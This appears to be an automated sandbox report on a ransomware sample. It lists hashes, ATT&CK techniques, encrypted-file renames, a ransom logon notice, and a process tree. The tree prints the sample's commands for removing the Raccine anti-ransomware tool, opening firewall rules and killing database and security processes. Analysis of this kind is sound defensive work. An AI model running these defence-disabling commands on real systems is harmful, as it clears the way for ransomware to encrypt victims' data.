fedb39ac98c39b688703f1968405d75432d881ff34405d3087a989440735aa8e

General

Target

iE8JUAJp7.bin.exe
Size

385KB
MD5

a9a0fae4766d9f7cafa1560f5f62e46f
SHA1

d582608dc07bd9f771334cdb60626755997dd56c
SHA256

f70966e32d18a1e2ed51ebdcc6b985d8f7613febf0680639076c71ebeab6a350
SHA512

5c2f89a16c5291d509f41bd5f12d18a386892738cfd5fb5cbd2156c52d46f28abde5f199461fe9a8bf3aa3f7e4644fe66c3ad48c3b114b792efdbf421468856b

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 15 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	15	http://live.sysinternals.com/PsExec.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\InitializeMount.crw => C:\Users\Admin\Pictures\InitializeMount.crw.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeMount.crw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\InvokeGrant.raw => C:\Users\Admin\Pictures\InvokeGrant.raw.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InvokeGrant.raw.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\ExitRestore.png => C:\Users\Admin\Pictures\ExitRestore.png.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ExitRestore.png.cyber	iE8JUAJp7.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File opened (read-only)	\??\Q:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\W:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\T:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\G:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\K:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\L:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\M:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\E:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\A:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Z:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\X:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\V:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\R:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\I:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\S:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\F:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\H:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\B:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Y:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\U:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\O:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\P:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\J:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\N:	iE8JUAJp7.bin.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 icanhazip.com

flow	ioc
8	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1832	taskkill.exe
1152	taskkill.exe
848	taskkill.exe
1720	taskkill.exe
1752	taskkill.exe
1528	taskkill.exe
996	taskkill.exe
1964	taskkill.exe
1700	taskkill.exe
1884	taskkill.exe
1960	taskkill.exe
1116	taskkill.exe
1708	taskkill.exe
1448	taskkill.exe
1796	taskkill.exe
764	taskkill.exe
1696	taskkill.exe
1136	taskkill.exe
1708	taskkill.exe
548	taskkill.exe
920	taskkill.exe
1920	taskkill.exe
1584	taskkill.exe
1744	taskkill.exe
1100	taskkill.exe
1920	taskkill.exe
1596	taskkill.exe
548	taskkill.exe
892	taskkill.exe
1176	taskkill.exe
2016	taskkill.exe
1556	taskkill.exe
2000	taskkill.exe
1580	taskkill.exe
1252	taskkill.exe
1652	taskkill.exe
1820	taskkill.exe
1604	taskkill.exe
1668	taskkill.exe
1240	taskkill.exe
1756	taskkill.exe
1456	taskkill.exe
1612	taskkill.exe
1960	taskkill.exe
1896	taskkill.exe
1816	taskkill.exe
1892	taskkill.exe
1448	taskkill.exe
1288	taskkill.exe
1696	taskkill.exe
1100	taskkill.exe
1508	taskkill.exe
1368	taskkill.exe
1764	taskkill.exe
1396	taskkill.exe
844	taskkill.exe
1196	taskkill.exe
1596	taskkill.exe

Modifies registry class 20 IoCs

Processes:

splwow64.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_Classes\Local Settings	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	splwow64.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1040 reg.exe

pid	process
1040	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

iE8JUAJp7.bin.exe

pid	process
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe
2032	iE8JUAJp7.bin.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

Processes:

iE8JUAJp7.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2032	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	2032	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	1700
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	1152	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	848	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	756	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

2032 iE8JUAJp7.bin.exe
2032 iE8JUAJp7.bin.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

2032 iE8JUAJp7.bin.exe
2032 iE8JUAJp7.bin.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

splwow64.exe

pid process

1136 splwow64.exe

pid	process
1136	splwow64.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iE8JUAJp7.bin.exe

description	pid	process	target process
PID 2032 wrote to memory of 1612	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1612	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1612	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1612	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1520	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1520	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1520	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1520	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1040	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1040	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1040	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1040	2032	iE8JUAJp7.bin.exe	reg.exe
PID 2032 wrote to memory of 1444	2032	iE8JUAJp7.bin.exe	schtasks.exe
PID 2032 wrote to memory of 1444	2032	iE8JUAJp7.bin.exe	schtasks.exe
PID 2032 wrote to memory of 1444	2032	iE8JUAJp7.bin.exe	schtasks.exe
PID 2032 wrote to memory of 1444	2032	iE8JUAJp7.bin.exe	schtasks.exe
PID 2032 wrote to memory of 1260	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1260	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1260	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1260	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1600	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1600	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1600	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1600	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1536	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1536	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1536	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1536	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1608	2032	iE8JUAJp7.bin.exe	netsh.exe
PID 2032 wrote to memory of 1608	2032	iE8JUAJp7.bin.exe	netsh.exe
PID 2032 wrote to memory of 1608	2032	iE8JUAJp7.bin.exe	netsh.exe
PID 2032 wrote to memory of 1608	2032	iE8JUAJp7.bin.exe	netsh.exe
PID 2032 wrote to memory of 996	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 996	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 996	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 996	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1456	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1456	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1456	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1456	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 2016	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 2016	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 2016	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 2016	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 284	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 284	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 284	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 284	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1900	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1900	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1900	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1900	2032	iE8JUAJp7.bin.exe	sc.exe
PID 2032 wrote to memory of 1920	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1920	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1920	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1920	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1668	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1668	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1668	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1668	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1960	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1960	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1960	2032	iE8JUAJp7.bin.exe	taskkill.exe
PID 2032 wrote to memory of 1960	2032	iE8JUAJp7.bin.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	iE8JUAJp7.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
"C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2032

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1040

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:1444

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:1260

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:1600

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1536

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1608

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:996

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1456

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:2016

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:284

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:1900

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:1700

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:656

